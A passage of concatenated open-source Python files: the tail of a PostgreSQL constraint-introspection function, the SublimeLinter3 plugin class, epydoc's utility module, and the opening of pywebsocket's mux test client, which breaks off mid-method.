FROM information_schema.constraint_column_usage
WHERE constraint_name = kc.constraint_name)
FROM information_schema.key_column_usage AS kc
JOIN information_schema.table_constraints AS c ON
kc.table_schema = c.table_schema AND
kc.table_name = c.table_name AND
kc.constraint_name = c.constraint_name
WHERE
kc.table_schema = %s AND
kc.table_name = %s
ORDER BY kc.ordinal_position ASC
""", ["public", table_name])
for constraint, column, kind, used_cols in cursor.fetchall():
# If we're the first column, make the record
if constraint not in constraints:
constraints[constraint] = {
"columns": [],
"primary_key": kind.lower() == "primary key",
"unique": kind.lower() in ["primary key", "unique"],
"foreign_key": tuple(used_cols[0].split(".", 1)) if kind.lower() == "foreign key" else None,
"check": False,
"index": False,
}
# Record the details
constraints[constraint]['columns'].append(column)
# Now get CHECK constraint columns
cursor.execute("""
SELECT kc.constraint_name, kc.column_name
FROM information_schema.constraint_column_usage AS kc
JOIN information_schema.table_constraints AS c ON
kc.table_schema = c.table_schema AND
kc.table_name = c.table_name AND
kc.constraint_name = c.constraint_name
WHERE
c.constraint_type = 'CHECK' AND
kc.table_schema = %s AND
kc.table_name = %s
""", ["public", table_name])
for constraint, column in cursor.fetchall():
# If we're the first column, make the record
if constraint not in constraints:
constraints[constraint] = {
"columns": [],
"primary_key": False,
"unique": False,
"foreign_key": None,
"check": True,
"index": False,
}
# Record the details
constraints[constraint]['columns'].append(column)
# Now get indexes
cursor.execute("""
SELECT
c2.relname,
ARRAY(
SELECT (SELECT attname FROM pg_catalog.pg_attribute WHERE attnum = i AND attrelid = c.oid)
FROM unnest(idx.indkey) i
),
idx.indisunique,
idx.indisprimary
FROM pg_catalog.pg_class c, pg_catalog.pg_class c2,
pg_catalog.pg_index idx
WHERE c.oid = idx.indrelid
AND idx.indexrelid = c2.oid
AND c.relname = %s
""", [table_name])
for index, columns, unique, primary in cursor.fetchall():
if index not in constraints:
constraints[index] = {
"columns": list(columns),
"primary_key": primary,
"unique": unique,
"foreign_key": None,
"check": False,
"index": True,
}
return constraints
| mit |
bxcn/sublime_plugins | Packages/SublimeLinter/sublimelinter.py | 10 | 15660 | #
# sublimelinter.py
# Part of SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by Ryan Hileman and Aparajita Fishman
#
# Project: https://github.com/SublimeLinter/SublimeLinter3
# License: MIT
#
"""This module provides the SublimeLinter plugin class and supporting methods."""
import os
import re
import sublime
import sublime_plugin
from .lint.linter import Linter
from .lint.highlight import HighlightSet
from .lint.queue import queue
from .lint import persist, util
def plugin_loaded():
"""The ST3 entry point for plugins."""
persist.plugin_is_loaded = True
persist.settings.load()
persist.printf('debug mode:', 'on' if persist.debug_mode() else 'off')
util.create_tempdir()
for linter in persist.linter_classes.values():
linter.initialize()
plugin = SublimeLinter.shared_plugin()
queue.start(plugin.lint)
util.generate_menus()
util.generate_color_scheme(from_reload=False)
persist.settings.on_update_call(SublimeLinter.on_settings_updated)
# This ensures we lint the active view on a fresh install
window = sublime.active_window()
if window:
plugin.on_activated(window.active_view())
class SublimeLinter(sublime_plugin.EventListener):
"""The main ST3 plugin class."""
# We use this to match linter settings filenames.
LINTER_SETTINGS_RE = re.compile('^SublimeLinter(-.+?)?\.sublime-settings')
shared_instance = None
@classmethod
def shared_plugin(cls):
"""Return the plugin instance."""
return cls.shared_instance
def __init__(self, *args, **kwargs):
"""Initialize a new instance."""
super().__init__(*args, **kwargs)
# Keeps track of which views we have assigned linters to
self.loaded_views = set()
# Keeps track of which views have actually been linted
self.linted_views = set()
# A mapping between view ids and syntax names
self.view_syntax = {}
self.__class__.shared_instance = self
@classmethod
def lint_all_views(cls):
"""Simulate a modification of all views, which will trigger a relint."""
def apply(view):
if view.id() in persist.view_linters:
cls.shared_instance.hit(view)
util.apply_to_all_views(apply)
def lint(self, view_id, hit_time=None, callback=None):
"""
Lint the view with the given id.
This method is called asynchronously by queue.Daemon when a lint
request is pulled off the queue.
If provided, hit_time is the time at which the lint request was added
to the queue. It is used to determine if the view has been modified
since the lint request was queued. If so, the lint is aborted, since
another lint request is already in the queue.
callback is the method to call when the lint is finished. If not
provided, it defaults to highlight().
"""
# If the view has been modified since the lint was triggered,
# don't lint again.
if hit_time is not None and persist.last_hit_times.get(view_id, 0) > hit_time:
return
view = Linter.get_view(view_id)
if view is None:
return
filename = view.file_name()
code = Linter.text(view)
callback = callback or self.highlight
Linter.lint_view(view, filename, code, hit_time, callback)
def highlight(self, view, linters, hit_time):
"""
Highlight any errors found during a lint of the given view.
This method is called by Linter.lint_view after linting is finished.
linters is a list of the linters that ran. hit_time has the same meaning
as in lint(), and if the view was modified since the lint request was
made, this method aborts drawing marks.
If the view has not been modified since hit_time, all of the marks and
errors from the list of linters are aggregated and drawn, and the status
is updated.
"""
vid = view.id()
# If the view has been modified since the lint was triggered,
# don't draw marks.
if hit_time is not None and persist.last_hit_times.get(vid, 0) > hit_time:
return
errors = {}
highlights = persist.highlights[vid] = HighlightSet()
for linter in linters:
if linter.highlight:
highlights.add(linter.highlight)
if linter.errors:
for line, errs in linter.errors.items():
errors.setdefault(line, []).extend(errs)
# Keep track of one view in each window that shares view's buffer
window_views = {}
buffer_id = view.buffer_id()
for window in sublime.windows():
wid = window.id()
for other_view in window.views():
if other_view.buffer_id() == buffer_id:
vid = other_view.id()
persist.highlights[vid] = highlights
highlights.clear(other_view)
highlights.draw(other_view)
persist.errors[vid] = errors
if window_views.get(wid) is None:
window_views[wid] = other_view
for view in window_views.values():
self.on_selection_modified_async(view)
def hit(self, view):
"""Record an activity that could trigger a lint and enqueue a desire to lint."""
vid = view.id()
self.check_syntax(view)
self.linted_views.add(vid)
if view.size() == 0:
for linter in Linter.get_linters(vid):
linter.clear()
return
persist.last_hit_times[vid] = queue.hit(view)
def check_syntax(self, view):
"""
Check and return if view's syntax has changed.
If the syntax has changed, a new linter is assigned.
"""
vid = view.id()
syntax = persist.get_syntax(view)
# Syntax either has never been set or just changed
if vid not in self.view_syntax or self.view_syntax[vid] != syntax:
self.view_syntax[vid] = syntax
Linter.assign(view, reset=True)
self.clear(view)
return True
else:
return False
def clear(self, view):
"""Clear all marks, errors and status from the given view."""
Linter.clear_view(view)
def is_scratch(self, view):
"""
Return whether a view is effectively scratch.
There is a bug (or feature) in the current ST3 where the Find panel
is not marked scratch but has no window.
There is also a bug where settings files opened from within .sublime-package
files are not marked scratch during the initial on_modified event, so we have
to check that a view with a filename actually exists on disk if the file
being opened is in the Sublime Text packages directory.
"""
if view.is_scratch() or view.is_read_only() or view.window() is None or view.settings().get("repl") is not None:
return True
elif (
view.file_name() and
view.file_name().startswith(sublime.packages_path() + os.path.sep) and
not os.path.exists(view.file_name())
):
return True
else:
return False
def view_has_file_only_linter(self, vid):
"""Return True if any linters for the given view are file-only."""
for lint in persist.view_linters.get(vid, []):
if lint.tempfile_suffix == '-':
return True
return False
# sublime_plugin.EventListener event handlers
def on_modified(self, view):
"""Called when a view is modified."""
if self.is_scratch(view):
return
if view.id() not in persist.view_linters:
syntax_changed = self.check_syntax(view)
if not syntax_changed:
return
else:
syntax_changed = False
if syntax_changed or persist.settings.get('lint_mode', 'background') == 'background':
self.hit(view)
else:
self.clear(view)
def on_activated(self, view):
"""Called when a view gains input focus."""
if self.is_scratch(view):
return
# Reload the plugin settings.
persist.settings.load()
self.check_syntax(view)
view_id = view.id()
if view_id not in self.linted_views:
if view_id not in self.loaded_views:
self.on_new(view)
if persist.settings.get('lint_mode', 'background') in ('background', 'load/save'):
self.hit(view)
self.on_selection_modified_async(view)
def on_open_settings(self, view):
"""
Called when any settings file is opened.
view is the view that contains the text of the settings file.
"""
if self.is_settings_file(view, user_only=True):
persist.settings.save(view=view)
def is_settings_file(self, view, user_only=False):
"""Return True if view is a SublimeLinter settings file."""
filename = view.file_name()
if not filename:
return False
if not filename.startswith(sublime.packages_path()):
return False
dirname, filename = os.path.split(filename)
dirname = os.path.basename(dirname)
if self.LINTER_SETTINGS_RE.match(filename):
if user_only:
return dirname == 'User'
else:
return dirname in (persist.PLUGIN_DIRECTORY, 'User')
@classmethod
def on_settings_updated(cls, relint=False):
"""Callback triggered when the settings are updated."""
if relint:
cls.lint_all_views()
else:
Linter.redraw_all()
def on_new(self, view):
"""Called when a new buffer is created."""
self.on_open_settings(view)
if self.is_scratch(view):
return
vid = view.id()
self.loaded_views.add(vid)
self.view_syntax[vid] = persist.get_syntax(view)
def get_focused_view_id(self, view):
"""
Return the focused view which shares view's buffer.
When updating the status, we want to make sure we get
the selection of the focused view, since multiple views
into the same buffer may be open.
"""
active_view = view.window().active_view()
for view in view.window().views():
if view == active_view:
return view
def on_selection_modified_async(self, view):
"""Called when the selection changes (cursor moves or text selected)."""
if self.is_scratch(view):
return
view = self.get_focused_view_id(view)
if view is None:
return
vid = view.id()
# Get the line number of the first line of the first selection.
try:
lineno = view.rowcol(view.sel()[0].begin())[0]
except IndexError:
lineno = -1
if vid in persist.errors:
errors = persist.errors[vid]
if errors:
lines = sorted(list(errors))
counts = [len(errors[line]) for line in lines]
count = sum(counts)
plural = 's' if count > 1 else ''
if lineno in errors:
# Sort the errors by column
line_errors = sorted(errors[lineno], key=lambda error: error[0])
line_errors = [error[1] for error in line_errors]
if plural:
# Sum the errors before the first error on this line
index = lines.index(lineno)
first = sum(counts[0:index]) + 1
if len(line_errors) > 1:
last = first + len(line_errors) - 1
status = '{}-{} of {} errors: '.format(first, last, count)
else:
status = '{} of {} errors: '.format(first, count)
else:
status = 'Error: '
status += '; '.join(line_errors)
else:
status = '%i error%s' % (count, plural)
view.set_status('sublimelinter', status)
else:
view.erase_status('sublimelinter')
def on_pre_save(self, view):
"""
Called before view is saved.
If a settings file is the active view and is saved,
copy the current settings first so we can compare post-save.
"""
if view.window().active_view() == view and self.is_settings_file(view):
persist.settings.copy()
def on_post_save(self, view):
"""Called after view is saved."""
if self.is_scratch(view):
return
# First check to see if the project settings changed
if view.window().project_file_name() == view.file_name():
self.lint_all_views()
else:
# Now see if a .sublimelinterrc has changed
filename = os.path.basename(view.file_name())
if filename == '.sublimelinterrc':
# If a .sublimelinterrc has changed, to be safe
# clear the rc cache and relint.
util.get_rc_settings.cache_clear()
self.lint_all_views()
# If a file other than one of our settings files changed,
# check if the syntax changed or if we need to show errors.
elif filename != 'SublimeLinter.sublime-settings':
self.file_was_saved(view)
def file_was_saved(self, view):
"""Check if the syntax changed or if we need to show errors."""
syntax_changed = self.check_syntax(view)
vid = view.id()
mode = persist.settings.get('lint_mode', 'background')
show_errors = persist.settings.get('show_errors_on_save', False)
if syntax_changed:
self.clear(view)
if vid in persist.view_linters:
if mode != 'manual':
self.hit(view)
else:
show_errors = False
else:
show_errors = False
else:
if show_errors:
# if showing errors on save, linting must be synchronized.
self.lint(vid)
elif (
mode in ('load/save', 'save only') or
mode == 'background' and self.view_has_file_only_linter(vid)
):
self.hit(view)
elif mode == 'manual':
show_errors = False
if show_errors and vid in persist.errors and persist.errors[vid]:
view.run_command('sublimelinter_show_all_errors')
def on_close(self, view):
"""Called after view is closed."""
if self.is_scratch(view):
return
vid = view.id()
if vid in self.loaded_views:
self.loaded_views.remove(vid)
if vid in self.linted_views:
self.linted_views.remove(vid)
if vid in self.view_syntax:
del self.view_syntax[vid]
persist.view_did_close(vid)
class SublimelinterEditCommand(sublime_plugin.TextCommand):
"""A plugin command used to generate an edit object for a view."""
def run(self, edit):
"""Run the command."""
persist.edit(self.view.id(), edit)
| mit |
sanjuro/RCJK | vendor/epydoc/util.py | 9 | 14055 | # epydoc -- Utility functions
#
# Copyright (C) 2005 Edward Loper
# Author: Edward Loper <edloper@loper.org>
# URL: <http://epydoc.sf.net>
#
# $Id: util.py 1721 2008-02-15 01:02:30Z edloper $
"""
Miscellaneous utility functions that are used by multiple modules.
@group Python source types: is_module_file, is_package_dir, is_pyname,
py_src_filename
@group Text processing: wordwrap, decode_with_backslashreplace,
plaintext_to_html
"""
__docformat__ = 'epytext en'
import os, os.path, re, sys
######################################################################
## Python Source Types
######################################################################
PY_SRC_EXTENSIONS = ['.py', '.pyw']
PY_BIN_EXTENSIONS = ['.pyc', '.so', '.pyd']
def is_module_file(path):
# Make sure it's a file name.
if not isinstance(path, basestring):
return False
(dir, filename) = os.path.split(path)
(basename, extension) = os.path.splitext(filename)
return (os.path.isfile(path) and
re.match('[a-zA-Z_]\w*$', basename) and
extension in PY_SRC_EXTENSIONS+PY_BIN_EXTENSIONS)
def is_src_filename(filename):
if not isinstance(filename, basestring): return False
if not os.path.exists(filename): return False
return os.path.splitext(filename)[1] in PY_SRC_EXTENSIONS
def is_package_dir(dirname):
"""
Return true if the given directory is a valid package directory
(i.e., it names a directory that contains a valid __init__ file,
and its name is a valid identifier).
"""
# Make sure it's a directory name.
if not isinstance(dirname, basestring):
return False
if not os.path.isdir(dirname):
return False
dirname = os.path.abspath(dirname)
# Make sure it's a valid identifier. (Special case for
# "foo/", where os.path.split -> ("foo", "").)
(parent, dir) = os.path.split(dirname)
if dir == '': (parent, dir) = os.path.split(parent)
# The following constraint was removed because of sourceforge
# bug #1787028 -- in some cases (eg eggs), it's too strict.
#if not re.match('\w+$', dir):
# return False
for name in os.listdir(dirname):
filename = os.path.join(dirname, name)
if name.startswith('__init__.') and is_module_file(filename):
return True
else:
return False
def is_pyname(name):
return re.match(r"\w+(\.\w+)*$", name)
def py_src_filename(filename):
basefile, extension = os.path.splitext(filename)
if extension in PY_SRC_EXTENSIONS:
return filename
else:
for ext in PY_SRC_EXTENSIONS:
if os.path.isfile('%s%s' % (basefile, ext)):
return '%s%s' % (basefile, ext)
else:
raise ValueError('Could not find a corresponding '
'Python source file for %r.' % filename)
def munge_script_name(filename):
name = os.path.split(filename)[1]
name = re.sub(r'\W', '_', name)
return 'script-'+name
######################################################################
## Text Processing
######################################################################
def decode_with_backslashreplace(s):
r"""
Convert the given 8-bit string into unicode, treating any
character c such that ord(c)<128 as an ascii character, and
converting any c such that ord(c)>128 into a backslashed escape
sequence.
>>> decode_with_backslashreplace('abc\xff\xe8')
u'abc\\xff\\xe8'
"""
# s.encode('string-escape') is not appropriate here, since it
# also adds backslashes to some ascii chars (eg \ and ').
assert isinstance(s, str)
return (s
.decode('latin1')
.encode('ascii', 'backslashreplace')
.decode('ascii'))
def wordwrap(str, indent=0, right=75, startindex=0, splitchars=''):
"""
Word-wrap the given string. I.e., add newlines to the string such
that any lines that are longer than C{right} are broken into
shorter lines (at the first whitespace sequence that occurs before
index C{right}). If the given string contains newlines, they will
I{not} be removed. Any lines that begin with whitespace will not
be wordwrapped.
@param indent: If specified, then indent each line by this number
of spaces.
@type indent: C{int}
@param right: The right margin for word wrapping. Lines that are
longer than C{right} will be broken at the first whitespace
sequence before the right margin.
@type right: C{int}
@param startindex: If specified, then assume that the first line
is already preceeded by C{startindex} characters.
@type startindex: C{int}
@param splitchars: A list of non-whitespace characters which can
be used to split a line. (E.g., use '/\\' to allow path names
to be split over multiple lines.)
@rtype: C{str}
"""
if splitchars:
chunks = re.split(r'( +|\n|[^ \n%s]*[%s])' %
(re.escape(splitchars), re.escape(splitchars)),
str.expandtabs())
else:
chunks = re.split(r'( +|\n)', str.expandtabs())
result = [' '*(indent-startindex)]
charindex = max(indent, startindex)
for chunknum, chunk in enumerate(chunks):
if (charindex+len(chunk) > right and charindex > 0) or chunk == '\n':
result.append('\n' + ' '*indent)
charindex = indent
if chunk[:1] not in ('\n', ' '):
result.append(chunk)
charindex += len(chunk)
else:
result.append(chunk)
charindex += len(chunk)
return ''.join(result).rstrip()+'\n'
def plaintext_to_html(s):
"""
@return: An HTML string that encodes the given plaintext string.
In particular, special characters (such as C{'<'} and C{'&'})
are escaped.
@rtype: C{string}
"""
s = s.replace('&', '&').replace('"', '"')
s = s.replace('<', '<').replace('>', '>')
return s
def plaintext_to_latex(str, nbsp=0, breakany=0):
"""
@return: A LaTeX string that encodes the given plaintext string.
In particular, special characters (such as C{'$'} and C{'_'})
are escaped, and tabs are expanded.
@rtype: C{string}
@param breakany: Insert hyphenation marks, so that LaTeX can
break the resulting string at any point. This is useful for
small boxes (e.g., the type box in the variable list table).
@param nbsp: Replace every space with a non-breaking space
(C{'~'}).
"""
# These get converted to hyphenation points later
if breakany: str = re.sub('(.)', '\\1\1', str)
# These get converted to \textbackslash later.
str = str.replace('\\', '\0')
# Expand tabs
str = str.expandtabs()
# These elements need to be backslashed.
str = re.sub(r'([#$&%_\${}])', r'\\\1', str)
# These elements have special names.
str = str.replace('|', '{\\textbar}')
str = str.replace('<', '{\\textless}')
str = str.replace('>', '{\\textgreater}')
str = str.replace('^', '{\\textasciicircum}')
str = str.replace('~', '{\\textasciitilde}')
str = str.replace('\0', r'{\textbackslash}')
# replace spaces with non-breaking spaces
if nbsp: str = str.replace(' ', '~')
# Convert \1's to hyphenation points.
if breakany: str = str.replace('\1', r'\-')
return str
class RunSubprocessError(OSError):
def __init__(self, cmd, out, err):
OSError.__init__(self, '%s failed' % cmd[0])
self.out = out
self.err = err
def run_subprocess(cmd, data=None):
"""
Execute the command C{cmd} in a subprocess.
@param cmd: The command to execute, specified as a list
of string.
@param data: A string containing data to send to the
subprocess.
@return: A tuple C{(out, err)}.
@raise OSError: If there is any problem executing the
command, or if its exitval is not 0.
"""
if isinstance(cmd, basestring):
cmd = cmd.split()
# Under Python 2.4+, use subprocess
try:
from subprocess import Popen, PIPE
pipe = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE)
out, err = pipe.communicate(data)
if hasattr(pipe, 'returncode'):
if pipe.returncode == 0:
return out, err
else:
raise RunSubprocessError(cmd, out, err)
else:
# Assume that there was an error iff anything was written
# to the child's stderr.
if err == '':
return out, err
else:
raise RunSubprocessError(cmd, out, err)
except ImportError:
pass
# Under Python 2.3 or earlier, on unix, use popen2.Popen3 so we
# can access the return value.
import popen2
if hasattr(popen2, 'Popen3'):
pipe = popen2.Popen3(' '.join(cmd), True)
to_child = pipe.tochild
from_child = pipe.fromchild
child_err = pipe.childerr
if data:
to_child.write(data)
to_child.close()
out = err = ''
while pipe.poll() is None:
out += from_child.read()
err += child_err.read()
out += from_child.read()
err += child_err.read()
if pipe.wait() == 0:
return out, err
else:
raise RunSubprocessError(cmd, out, err)
# Under Python 2.3 or earlier, on non-unix, use os.popen3
else:
to_child, from_child, child_err = os.popen3(' '.join(cmd), 'b')
if data:
try:
to_child.write(data)
# Guard for a broken pipe error
except IOError, e:
raise OSError(e)
to_child.close()
out = from_child.read()
err = child_err.read()
# Assume that there was an error iff anything was written
# to the child's stderr.
if err == '':
return out, err
else:
raise RunSubprocessError(cmd, out, err)
######################################################################
## Terminal Control
######################################################################
class TerminalController:
"""
A class that can be used to portably generate formatted output to
a terminal. See
U{http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/475116}
for documentation. (This is a somewhat stripped-down version.)
"""
BOL = '' #: Move the cursor to the beginning of the line
UP = '' #: Move the cursor up one line
DOWN = '' #: Move the cursor down one line
LEFT = '' #: Move the cursor left one char
RIGHT = '' #: Move the cursor right one char
CLEAR_EOL = '' #: Clear to the end of the line.
CLEAR_LINE = '' #: Clear the current line; cursor to BOL.
BOLD = '' #: Turn on bold mode
NORMAL = '' #: Turn off all modes
COLS = 75 #: Width of the terminal (default to 75)
UNDERLINE = '' #: Underline the text
REVERSE = '' #: Reverse the foreground & background
BLACK = BLUE = GREEN = CYAN = RED = MAGENTA = YELLOW = WHITE = ''
_STRING_CAPABILITIES = """
BOL=cr UP=cuu1 DOWN=cud1 LEFT=cub1 RIGHT=cuf1 REVERSE=rev
CLEAR_EOL=el BOLD=bold UNDERLINE=smul NORMAL=sgr0""".split()
_COLORS = """BLACK BLUE GREEN CYAN RED MAGENTA YELLOW WHITE""".split()
_ANSICOLORS = "BLACK RED GREEN YELLOW BLUE MAGENTA CYAN WHITE".split()
#: If this is set to true, then new TerminalControllers will
#: assume that the terminal is not capable of doing manipulation
#: of any kind.
FORCE_SIMPLE_TERM = False
def __init__(self, term_stream=sys.stdout):
# If the stream isn't a tty, then assume it has no capabilities.
if not term_stream.isatty(): return
if self.FORCE_SIMPLE_TERM: return
# Curses isn't available on all platforms
try: import curses
except:
# If it's not available, then try faking enough to get a
# simple progress bar.
self.BOL = '\r'
self.CLEAR_LINE = '\r' + ' '*self.COLS + '\r'
# Check the terminal type. If we fail, then assume that the
# terminal has no capabilities.
try: curses.setupterm()
except: return
# Look up numeric capabilities.
self.COLS = curses.tigetnum('cols')
# Look up string capabilities.
for capability in self._STRING_CAPABILITIES:
(attrib, cap_name) = capability.split('=')
setattr(self, attrib, self._tigetstr(cap_name) or '')
if self.BOL and self.CLEAR_EOL:
self.CLEAR_LINE = self.BOL+self.CLEAR_EOL
# Colors
set_fg = self._tigetstr('setf')
if set_fg:
for i,color in zip(range(len(self._COLORS)), self._COLORS):
setattr(self, color, curses.tparm(set_fg, i) or '')
set_fg_ansi = self._tigetstr('setaf')
if set_fg_ansi:
for i,color in zip(range(len(self._ANSICOLORS)), self._ANSICOLORS):
setattr(self, color, curses.tparm(set_fg_ansi, i) or '')
def _tigetstr(self, cap_name):
# String capabilities can include "delays" of the form "$<2>".
# For any modern terminal, we should be able to just ignore
# these, so strip them out.
import curses
cap = curses.tigetstr(cap_name) or ''
return re.sub(r'\$<\d+>[/*]?', '', cap)
def render(self, template):
"""
Replace each $-substitutions in the given template string with
the corresponding terminal control string (if it's defined) or
'' (if it's not).
"""
return re.sub(r'\$\$|\${\w+}', self._render_sub, template)
def _render_sub(self, match):
s = match.group()
if s == '$$': return s
else: return getattr(self, s[2:-1])
| apache-2.0 |
vks/servo | tests/wpt/web-platform-tests/tools/pywebsocket/src/test/mux_client_for_testing.py | 457 | 25761 | #!/usr/bin/env python
#
# Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket client utility for testing mux extension.
This code should be independent from mod_pywebsocket. See the comment of
client_for_testing.py.
NOTE: This code is far from robust like client_for_testing.py.
"""
import Queue
import base64
import collections
import email
import email.parser
import logging
import math
import os
import random
import socket
import struct
import threading
from mod_pywebsocket import util
from test import client_for_testing
_CONTROL_CHANNEL_ID = 0
_DEFAULT_CHANNEL_ID = 1
_MUX_OPCODE_ADD_CHANNEL_REQUEST = 0
_MUX_OPCODE_ADD_CHANNEL_RESPONSE = 1
_MUX_OPCODE_FLOW_CONTROL = 2
_MUX_OPCODE_DROP_CHANNEL = 3
_MUX_OPCODE_NEW_CHANNEL_SLOT = 4
class _ControlBlock:
def __init__(self, opcode):
self.opcode = opcode
def _parse_handshake_response(response):
status_line, header_lines = response.split('\r\n', 1)
words = status_line.split(' ')
if len(words) < 3:
raise ValueError('Bad Status-Line syntax %r' % status_line)
[version, response_code] = words[:2]
if version != 'HTTP/1.1':
raise ValueError('Bad response version %r' % version)
if response_code != '101':
raise ValueError('Bad response code %r ' % response_code)
headers = email.parser.Parser().parsestr(header_lines)
return headers
def _parse_channel_id(data, offset=0):
length = len(data)
remaining = length - offset
if remaining <= 0:
raise Exception('No channel id found')
channel_id = ord(data[offset])
channel_id_length = 1
if channel_id & 0xe0 == 0xe0:
if remaining < 4:
raise Exception('Invalid channel id format')
channel_id = struct.unpack('!L',
data[offset:offset+4])[0] & 0x1fffffff
channel_id_length = 4
elif channel_id & 0xc0 == 0xc0:
if remaining < 3:
raise Exception('Invalid channel id format')
channel_id = (((channel_id & 0x1f) << 16) +
struct.unpack('!H', data[offset+1:offset+3])[0])
channel_id_length = 3
elif channel_id & 0x80 == 0x80:
if remaining < 2:
raise Exception('Invalid channel id format')
channel_id = struct.unpack('!H', data[offset:offset+2])[0] & 0x3fff
channel_id_length = 2
return channel_id, channel_id_length
def _parse_number(data, offset=0):
first_byte = ord(data[offset])
if (first_byte & 0x80) != 0:
raise Exception('The MSB of number field must be unset')
first_byte = first_byte & 0x7f
if first_byte == 127:
if offset + 9 > len(data):
raise Exception('Invalid number')
return struct.unpack('!Q', data[offset+1:offset+9])[0], 9
if first_byte == 126:
if offset + 3 > len(data):
raise Exception('Invalid number')
return struct.unpack('!H', data[offset+1:offset+3])[0], 3
return first_byte, 1
def _parse_size_and_contents(data, offset=0):
size, advance = _parse_number(data, offset)
start_position = offset + advance
end_position = start_position + size
if len(data) < end_position:
raise Exception('Invalid size of control block (%d < %d)' % (
len(data), end_position))
return data[start_position:end_position], size + advance
def _parse_control_blocks(data):
blocks = []
length = len(data)
pos = 0
while pos < length:
first_byte = ord(data[pos])
pos += 1
opcode = (first_byte >> 5) & 0x7
block = _ControlBlock(opcode)
# TODO(bashi): Support more opcode
if opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
block.encode = first_byte & 3
block.rejected = (first_byte >> 4) & 1
channel_id, advance = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += advance
encoded_handshake, advance = _parse_size_and_contents(data, pos)
block.encoded_handshake = encoded_handshake
pos += advance
blocks.append(block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
block.mux_error = (first_byte >> 4) & 1
channel_id, advance = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += advance
reason, advance = _parse_size_and_contents(data, pos)
if len(reason) == 0:
block.drop_code = None
block.drop_message = ''
elif len(reason) >= 2:
block.drop_code = struct.unpack('!H', reason[:2])[0]
block.drop_message = reason[2:]
else:
raise Exception('Invalid DropChannel')
pos += advance
blocks.append(block)
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
channel_id, advance = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += advance
send_quota, advance = _parse_number(data, pos)
block.send_quota = send_quota
pos += advance
blocks.append(block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
fallback = first_byte & 1
slots, advance = _parse_number(data, pos)
pos += advance
send_quota, advance = _parse_number(data, pos)
pos += advance
if fallback == 1 and (slots != 0 or send_quota != 0):
raise Exception('slots and send_quota must be zero if F bit '
'is set')
block.fallback = fallback
block.slots = slots
block.send_quota = send_quota
blocks.append(block)
else:
raise Exception(
'Unsupported mux opcode %d received' % opcode)
return blocks
def _encode_channel_id(channel_id):
if channel_id < 0:
raise ValueError('Channel id %d must not be negative' % channel_id)
if channel_id < 2 ** 7:
return chr(channel_id)
if channel_id < 2 ** 14:
return struct.pack('!H', 0x8000 + channel_id)
if channel_id < 2 ** 21:
first = chr(0xc0 + (channel_id >> 16))
return first + struct.pack('!H', channel_id & 0xffff)
if channel_id < 2 ** 29:
return struct.pack('!L', 0xe0000000 + channel_id)
raise ValueError('Channel id %d is too large' % channel_id)
def _encode_number(number):
if number <= 125:
return chr(number)
elif number < (1 << 16):
return chr(0x7e) + struct.pack('!H', number)
elif number < (1 << 63):
return chr(0x7f) + struct.pack('!Q', number)
else:
raise Exception('Invalid number')
def _create_add_channel_request(channel_id, encoded_handshake,
encoding=0):
length = len(encoded_handshake)
handshake_length = _encode_number(length)
first_byte = (_MUX_OPCODE_ADD_CHANNEL_REQUEST << 5) | encoding
return (chr(first_byte) + _encode_channel_id(channel_id) +
handshake_length + encoded_handshake)
def _create_flow_control(channel_id, replenished_quota):
first_byte = (_MUX_OPCODE_FLOW_CONTROL << 5)
return (chr(first_byte) + _encode_channel_id(channel_id) +
_encode_number(replenished_quota))
class _MuxReaderThread(threading.Thread):
"""Mux reader thread.
Reads frames and passes them to the mux client. This thread accesses
private functions/variables of the mux client.
"""
def __init__(self, mux):
threading.Thread.__init__(self)
self.setDaemon(True)
self._mux = mux
self._stop_requested = False
def _receive_message(self):
first_opcode = None
pending_payload = []
while not self._stop_requested:
fin, rsv1, rsv2, rsv3, opcode, payload_length = (
client_for_testing.read_frame_header(self._mux._socket))
if not first_opcode:
if opcode == client_for_testing.OPCODE_TEXT:
raise Exception('Received a text message on physical '
'connection')
if opcode == client_for_testing.OPCODE_CONTINUATION:
raise Exception('Received an intermediate frame but '
'fragmentation was not started')
if (opcode == client_for_testing.OPCODE_BINARY or
opcode == client_for_testing.OPCODE_PONG or
opcode == client_for_testing.OPCODE_PONG or
opcode == client_for_testing.OPCODE_CLOSE):
first_opcode = opcode
else:
raise Exception('Received an undefined opcode frame: %d' %
opcode)
elif opcode != client_for_testing.OPCODE_CONTINUATION:
raise Exception('Received a new opcode before '
'terminating fragmentation')
payload = client_for_testing.receive_bytes(
self._mux._socket, payload_length)
if self._mux._incoming_frame_filter is not None:
